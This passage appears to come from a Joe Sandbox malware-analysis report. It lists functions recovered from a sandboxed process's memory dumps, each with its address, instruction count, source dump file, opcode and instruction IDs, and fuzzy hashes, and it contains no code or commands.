                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6ed8d2de3377dff8c1475b4382b1f86ac7a87d8d76d00b65bb6abcbfb057505a
                                                                                        • Instruction ID: 86d84127b70ecc13ba9e70b278e0117904a1183b59b1a0d8cad6c2771dc5407c
                                                                                        • Opcode Fuzzy Hash: 6ed8d2de3377dff8c1475b4382b1f86ac7a87d8d76d00b65bb6abcbfb057505a
                                                                                        • Instruction Fuzzy Hash: 4EF0683144E2CADFD7129BF4C8A15DA3FB4EF47301B1600F6D045CB0A2C56D5615C761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC70A02 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5b762b5e0a46bf68ec2f99b6ddd0c2f3527f1da2da8a3709ef11211625cac74f
                                                                                        • Instruction ID: 4238fa29645612545e754d9f26ebb9bfce946faf0ccf2dcfe7881a91bd485f27
                                                                                        • Opcode Fuzzy Hash: 5b762b5e0a46bf68ec2f99b6ddd0c2f3527f1da2da8a3709ef11211625cac74f
                                                                                        • Instruction Fuzzy Hash: 28F0623294F2CA9FDB228BB088619997FB4EF42610F1901FAE099870A2D62C1716C761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC89852 Relevance: .0, Instructions: 38COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f6980264234f8607f245501510a45963cfc92543651a7e8369ccdd40d96efd7
                                                                                        • Instruction ID: 40b8d3d0865817cc5d03f8ba465058714d2d885c3457323961bba6ca089ce617
                                                                                        • Opcode Fuzzy Hash: 8f6980264234f8607f245501510a45963cfc92543651a7e8369ccdd40d96efd7
                                                                                        • Instruction Fuzzy Hash: CDF0F63294E6CA9FD3228BB098654D93FA4EF03200F1900F6D145C70A2C57D6706C771
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAAEC59 Relevance: .0, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baad000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4c0840f09f07545ec0e39c522cb9ae3316b1d4faa67d2498352507209e23cd80
                                                                                        • Instruction ID: 6f0b8bb088a9cde9030c01b3baa350bbee50a8ac3d559b8bc9f2294f43cd456c
                                                                                        • Opcode Fuzzy Hash: 4c0840f09f07545ec0e39c522cb9ae3316b1d4faa67d2498352507209e23cd80
                                                                                        • Instruction Fuzzy Hash: 31F0FF31E0E3CD4FE761ABA8486A1E8BFB1EF11210F4601F7D048C60E2EA692A088751
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC923F2 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ca36628ea0f343e1ed890640ad7718a5f8e3445ad3f42e70db5ccbd7725f7df
                                                                                        • Instruction ID: 2b8cdb971c7332dfe2d6421ca2c06eb794b0e63d1c2f817f6b5d171face94b06
                                                                                        • Opcode Fuzzy Hash: 4ca36628ea0f343e1ed890640ad7718a5f8e3445ad3f42e70db5ccbd7725f7df
                                                                                        • Instruction Fuzzy Hash: 42F0903198E2CA9FE7169BF0C9615E97FB4AF03214F5904F6E085CB4B2C62C664AC761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC98082 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f2a2aec8c63e92cf6740483a3f63cd634542791c8ade5e489330d9b56c6b31e5
                                                                                        • Instruction ID: afe569f4b4316cd96925276c541c8cb6a3c1248bd541c0b5096b860565cf4f48
                                                                                        • Opcode Fuzzy Hash: f2a2aec8c63e92cf6740483a3f63cd634542791c8ade5e489330d9b56c6b31e5
                                                                                        • Instruction Fuzzy Hash: DBF0623194E2C99FF3229BB08C258997FA4AF43350B1A00EAD449C70B2C56D1706C761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC76622 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4d9c37ce43c68689b17bfe49be52dc7be6b0f888a159d52830f07b0c22e8fe0c
                                                                                        • Instruction ID: 9596d640f9cdcbc5ec70e55b6cc83d1ec90722a5aa0fae91f56c73e83057d4e1
                                                                                        • Opcode Fuzzy Hash: 4d9c37ce43c68689b17bfe49be52dc7be6b0f888a159d52830f07b0c22e8fe0c
                                                                                        • Instruction Fuzzy Hash: 17F0623154E2CA9FD326CBB0C8655997FA4EF43314B5900FAE485C70A2C57C5646C761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9C295C38 Relevance: .0, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2937457782.00007FFD9C290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C290000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9c290000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cb6c1b2a77a6b125987ef7c1d368c39ea4dd9f6185dc36f45c183dcde9814028
                                                                                        • Instruction ID: 5e3561e0e04c8620cfc4c2b65f773b8d097cd1ca52a7b82082a4ce6d0978be40
                                                                                        • Opcode Fuzzy Hash: cb6c1b2a77a6b125987ef7c1d368c39ea4dd9f6185dc36f45c183dcde9814028
                                                                                        • Instruction Fuzzy Hash: FFF0C934A1454E9FDB94EF58C954AAEB7B0FB58304F1045AAE419D32A4DB30A650CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAB743D Relevance: .0, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bab5000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9f4011fbe0c50ff8af920f1981478fa645062b92b564c479b4caa1240d13dc17
                                                                                        • Instruction ID: 025c4191dd91d22213915900ee4c57bf5f8a88a4e80b04309f612e6d70341ccb
                                                                                        • Opcode Fuzzy Hash: 9f4011fbe0c50ff8af920f1981478fa645062b92b564c479b4caa1240d13dc17
                                                                                        • Instruction Fuzzy Hash: 8FF0903050968DCFCB94EF18C8556993FE0FF69300F0501A6E45CC7162D774D964CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAB7C5D Relevance: .0, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bab5000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 829580c93f66a2f55bb65d8df64632570ecc39d934f9a62956582d9d7da81384
                                                                                        • Instruction ID: b50725b463e153f7158f59dc9dbbb0fd149529feecfdf93138203528c4a4a766
                                                                                        • Opcode Fuzzy Hash: 829580c93f66a2f55bb65d8df64632570ecc39d934f9a62956582d9d7da81384
                                                                                        • Instruction Fuzzy Hash: 5EF0903450968DCFCB95EF1CC895A9A7BE0FF69300F0501A9E418C7161D774D9A4CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA6315 Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baa0000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7fe4ebf4f247516c445e86e170f4bdbcdd3346c2a10a4e36a1c8aa0a01777253
                                                                                        • Instruction ID: 57297dbeab6b84211cae8ccc63856050962e15a47253185626cb337fcc65dfbd
                                                                                        • Opcode Fuzzy Hash: 7fe4ebf4f247516c445e86e170f4bdbcdd3346c2a10a4e36a1c8aa0a01777253
                                                                                        • Instruction Fuzzy Hash: BD01E1B0E1911ECFEB759F54C8647B8B2F5AB54341F0155F9C00DA61A0CAB86B88CF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAB7295 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bab5000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 85cb00d04a7b089d3dc11f5aee9b17fb0d526ce7c19525951c426e676d83715c
                                                                                        • Instruction ID: acd706561066642c2465167efaa00d986ff8eb605d1fc7be79d689accb3c8a59
                                                                                        • Opcode Fuzzy Hash: 85cb00d04a7b089d3dc11f5aee9b17fb0d526ce7c19525951c426e676d83715c
                                                                                        • Instruction Fuzzy Hash: 17F0A031D0E6CC9FEB51AB74886D2E87FF0EF15300F0544AAE858C60A2EA749654CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAC07DC Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baba000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fbad62dd7a0f54b8453a80643f74db47a7c36154bb75f738d0096969d1e45167
                                                                                        • Instruction ID: b3efcee4a895de28ab705a85cfe69f2d6d20e061ee8c2999688957d0c3199fde
                                                                                        • Opcode Fuzzy Hash: fbad62dd7a0f54b8453a80643f74db47a7c36154bb75f738d0096969d1e45167
                                                                                        • Instruction Fuzzy Hash: C4F07470E0A26ECEEBB0AFA4C4543BD76B4AF18704F218539D40D97192DBB86641DF88
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAAE6ED Relevance: .0, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baad000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4c60ebb40873257ec5b11d71e31f5cf07f1c8b76263d6a622c4412223925c796
                                                                                        • Instruction ID: 683208a1b94c6d89e97a2e5ca2ce9c79200d2972a69b4c1f46f36bfdfc5f695a
                                                                                        • Opcode Fuzzy Hash: 4c60ebb40873257ec5b11d71e31f5cf07f1c8b76263d6a622c4412223925c796
                                                                                        • Instruction Fuzzy Hash: 85F0A03081A38C8FCB52AF74CD64ADA7B70FF01204F0600E7E418C71E2EA34A614CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9C295C00 Relevance: .0, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2937457782.00007FFD9C290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C290000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9c290000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 38901324926a157e2b00b6afab272be2b4175c004d9fc10590703a28ef5b1b28
                                                                                        • Instruction ID: 9dd3c47e71bdef85a01e4dddfc2901d1224aba08606b5a95a70a37c6f0ff6464
                                                                                        • Opcode Fuzzy Hash: 38901324926a157e2b00b6afab272be2b4175c004d9fc10590703a28ef5b1b28
                                                                                        • Instruction Fuzzy Hash: 6BE0ED3092854E9BEB54FFA4C9556ED77B0FF04315F000476E41CD2391DA34A694CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAAE935 Relevance: .0, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baad000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: af809f811fa02466b6b0015bb7e66e1e97b6f2ed65a77208298d6c8fccde8a30
                                                                                        • Instruction ID: b51b2a87acad877cf05331409d0dab373f82c26d4cad3eea8f73177f1af6f196
                                                                                        • Opcode Fuzzy Hash: af809f811fa02466b6b0015bb7e66e1e97b6f2ed65a77208298d6c8fccde8a30
                                                                                        • Instruction Fuzzy Hash: 38E0D83284E38D4FD361675059752D8BBA0BF02300F4A05F7D448450E3DAA85618C752
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC716F7 Relevance: .0, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 69c627d894bce9d4e1493423b806f36da1c95a4eb70cb8f45ccca9bda3ae7901
                                                                                        • Instruction ID: b97b67ecf5060666474e20fa043c7d97c43cffd5e59ae08bfbacac6d1f0a0816
                                                                                        • Opcode Fuzzy Hash: 69c627d894bce9d4e1493423b806f36da1c95a4eb70cb8f45ccca9bda3ae7901
                                                                                        • Instruction Fuzzy Hash: 54E01291B0F7865FFB3606B408B51BC2BA0CF1B38175A05B7D19A4B1E3D9482A05A711
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC9985B Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2f6f537f34d3e0201e1201c95e5ab74f04eda6979ecb2712a844165de7bcd164
                                                                                        • Instruction ID: fb80efc5aaac4eca7116c8b305e47d3afb557b4a7f30f663c32f55ce92b86546
                                                                                        • Opcode Fuzzy Hash: 2f6f537f34d3e0201e1201c95e5ab74f04eda6979ecb2712a844165de7bcd164
                                                                                        • Instruction Fuzzy Hash: DAD0C920F0F54F85F33846F2803823D11958F44B00F62027DC09F41AF9CDACBB026225
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC93BBB Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
                                                                                        • Instruction ID: 2885ea9c98767a6a611a4e85b8af3c197a28d86a09c06b7caa227afc3d234039
                                                                                        • Opcode Fuzzy Hash: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
                                                                                        • Instruction Fuzzy Hash: 4FD0C950B1F50FC5F23A46B1403023E65908FD0700F62047EC0AF419F9CF2DBB016201
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC77E0B Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe0c738e8395d28f4c976d070807b3d6ce1783d3f4d8982ac130e78e2c75a7bf
                                                                                        • Instruction ID: 15cc7addb44a1e6b3146a12ebafc7c78fe382f4a0d214ca2d9e9f118c54584eb
                                                                                        • Opcode Fuzzy Hash: fe0c738e8395d28f4c976d070807b3d6ce1783d3f4d8982ac130e78e2c75a7bf
                                                                                        • Instruction Fuzzy Hash: 23D09224B0F90F89F17996A280F063D51D0DF05340F22883EC29F538E1C9187E016203
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC721CB Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 66bd70c3699dc62d1490bf579d71ae0ca55e23c5fc48e9c6c197b344ab109d0a
                                                                                        • Instruction ID: 521df972d7499e76e7061772c6648fab48bef7ac6ae0baf222d9e34cd3648046
                                                                                        • Opcode Fuzzy Hash: 66bd70c3699dc62d1490bf579d71ae0ca55e23c5fc48e9c6c197b344ab109d0a
                                                                                        • Instruction Fuzzy Hash: EFD09214F2F54F86F53846F148B063D519CEF02741F26003AC29F4A8E1891C7F416202
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC8B04B Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                        • Instruction ID: 62b815fef51e28582a051e01e6b4693c763995814771b015ed5f05b38e64224d
                                                                                        • Opcode Fuzzy Hash: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                        • Instruction Fuzzy Hash: A5D09250B0FE4F85F57856A181B023D71915F02301F22443EC47F458F28A3A7A026215
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC8A55F Relevance: .0, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f9e23db7711093ff3204458b67b621b305659c69b7f7706eb34c482d7da33ea
                                                                                        • Instruction ID: f141f5df57d9fd41098e5dfb4a3876d37350e35eb487a62b6bb7cc0c6da1611c
                                                                                        • Opcode Fuzzy Hash: 8f9e23db7711093ff3204458b67b621b305659c69b7f7706eb34c482d7da33ea
                                                                                        • Instruction Fuzzy Hash: D4C04840F0FA8A6AEB3296F008A507D06910B17240B560672E11A8A1E3E86C6A456A61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC98D91 Relevance: .0, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e291d069d006efcf43a58d36e8a4340d5918eff611ee7c28ce011526879cd27e
                                                                                        • Instruction ID: 460c98e4b27870d6b4fb0fd6e60575f27f6997afae9fc70d22f2398e8b4b9e12
                                                                                        • Opcode Fuzzy Hash: e291d069d006efcf43a58d36e8a4340d5918eff611ee7c28ce011526879cd27e
                                                                                        • Instruction Fuzzy Hash: D9B09200F0E20B86F23010F4086803C00810B49781BA20A30A20AE61E6DC8C2E001260
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC93101 Relevance: .0, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ffc4feeed5d67da2f431a81c625bd3c0f197f172cefdf09a6d949af9ff1863ff
                                                                                        • Instruction ID: a829304be4034a8ca2a45a0ef8e002494907122a9c316275c01e5dbfb50822e0
                                                                                        • Opcode Fuzzy Hash: ffc4feeed5d67da2f431a81c625bd3c0f197f172cefdf09a6d949af9ff1863ff
                                                                                        • Instruction Fuzzy Hash: 08B00204F4E60BD7F53410F404750BC04811B86245B760E35D55B5A2F7DD5C3B411651
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC77333 Relevance: .0, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a127916f9e9ee77f2908de0c4e9ea239c715b759c2d232d7798a4d81ade775f8
                                                                                        • Instruction ID: 40158d7cbc05fa8539fe8afaf7795a13f486a518a7344d9a5ba3a0d1a012b38a
                                                                                        • Opcode Fuzzy Hash: a127916f9e9ee77f2908de0c4e9ea239c715b759c2d232d7798a4d81ade775f8
                                                                                        • Instruction Fuzzy Hash: 9DB01200F0E20F93F57406F004F043C00C18B44240F921536D52B571F3DC8C3F102190
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9C290C42 Relevance: .0, Instructions: 5COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2937457782.00007FFD9C290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C290000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9c290000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
